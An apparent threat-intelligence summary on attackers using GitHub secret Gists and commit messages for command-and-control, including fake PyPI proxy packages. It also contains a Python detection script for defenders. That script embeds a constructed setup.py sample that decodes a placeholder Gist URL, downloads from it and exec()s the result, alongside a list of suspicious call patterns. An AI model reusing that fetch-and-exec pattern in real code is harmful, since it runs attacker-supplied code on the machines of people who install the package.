Hackers are increasingly utilizing GitHub for malicious purposes [1] [2] [3], exploiting secret Gists and issuing malicious commands through git commit messages [1] [2] [3]. This enables them to evade detection and control compromised hosts [2] [3]. While public services like Dropbox [2] [3], Google Drive [2] [3], and Discord have been used to host second stage malware, the use of GitHub as a malware hosting platform is on the rise [2] [3]. By utilizing public sources for command-and-control (C2) [2] [3], hackers can easily create affordable and reliable attack infrastructure. This technique allows them to blend their malicious network traffic with legitimate communications [2] [3], making it challenging to effectively detect and respond to threats.

Description

The abuse of GitHub Gists is a new trend [2] [3], as they provide a convenient way for developers to share code snippets [2] [3]. Although secret Gists are not accessible via GitHub’s Discover feed, they can be shared with others by sharing the URL [3]. This allows threat actors to leverage secret Gists as a pastebin service [2] [3]. Researchers have identified several PyPI packages that masquerade as network proxying libraries but actually contain Base64-encoded URLs pointing to secret Gists hosted on throwaway GitHub accounts [2] [3]. These Gists contain Base64-encoded commands that are executed through malicious code in the setup.py file of the counterfeit packages [2] [3]. Another observed technique is the exploitation of version control system features [2], where commands are extracted from git commit messages and executed on the system [2]. The fraudulent packages have been removed from the Python Package Index repository [2] [3].
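A triage check for the setup.py pattern described above, written here as an added example (not code from the cited reports): it scans a setup.py for long Base64 runs, decodes them, and flags any that resolve to Gist URLs sitting next to decode-and-exec primitives. The sample setup.py, its package name and the Gist URL hidden in it are constructed placeholders, never fetched or executed.

```python
import base64
import re

# Long runs of Base64 alphabet characters; short runs are skipped to cut noise.
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
GIST_HOSTS = ("gist.github.com", "gist.githubusercontent.com")
# Primitives the reports describe in the counterfeit packages' setup.py.
SUSPICIOUS_CALLS = ("b64decode", "urlopen", "exec(", "subprocess", "os.system")

# Constructed sample (hypothetical placeholder URL, never fetched or executed):
# a setup.py that hides a secret-Gist URL in Base64 and exec()s what it fetches.
_HIDDEN_URL = base64.b64encode(
    b"https://gist.githubusercontent.com/EXAMPLE-USER/PLACEHOLDER-ID/raw"
).decode()
SAMPLE_SETUP_PY = (
    "from setuptools import setup\n"
    "import base64, urllib.request\n"
    f'_u = base64.b64decode("{_HIDDEN_URL}").decode()\n'
    "exec(base64.b64decode(urllib.request.urlopen(_u).read()).decode())\n"
    'setup(name="example-proxy-lib", version="0.1")\n'
)
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="honest-lib", version="1.0")\n'


def decode_candidates(text):
    """Return every long Base64 run in text that decodes to printable UTF-8."""
    found = []
    for match in B64_RE.finditer(text):
        try:
            decoded = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue  # not Base64, bad padding, or a binary payload
        if decoded.isprintable():
            found.append(decoded)
    return found


def find_gist_indicators(setup_py_source):
    """Triage a setup.py: hidden Gist URLs plus decode/fetch/exec primitives."""
    decoded = decode_candidates(setup_py_source)
    hidden_urls = [s for s in decoded if any(h in s for h in GIST_HOSTS)]
    calls = [c for c in SUSPICIOUS_CALLS if c in setup_py_source]
    return {
        "hidden_gist_urls": hidden_urls,
        "suspicious_calls": calls,
        # A concealed Gist URL alongside exec() is the reported pattern.
        "verdict": bool(hidden_urls) and "exec(" in calls,
    }
```

Run `find_gist_indicators` over each package's setup.py before installation (or in a PyPI mirror's ingestion pipeline) and route a true verdict to manual review.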

Conclusion

While the use of GitHub as command-and-control infrastructure is not new [2], the abuse of features like GitHub Gists and commit messages for command delivery is a novel approach employed by malicious actors [2] [3]. These methods highlight the need for stronger security measures [1]. It is crucial to develop robust detection and response mechanisms to mitigate the risks associated with hackers utilizing GitHub for malicious purposes. Additionally, ongoing vigilance and proactive measures are necessary to stay ahead of evolving threats in the cybersecurity landscape.

References

[1] https://thehackernews.com/2023/12/hackers-abusing-github-to-evade.html
[2] https://www.ihash.eu/2023/12/hackers-abusing-github-to-evade-detection-and-control-compromised-hosts/
[3] https://owasp.or.id/2023/12/19/hackers-abusing-github-to-evade-detection-and-control-compromised-hosts/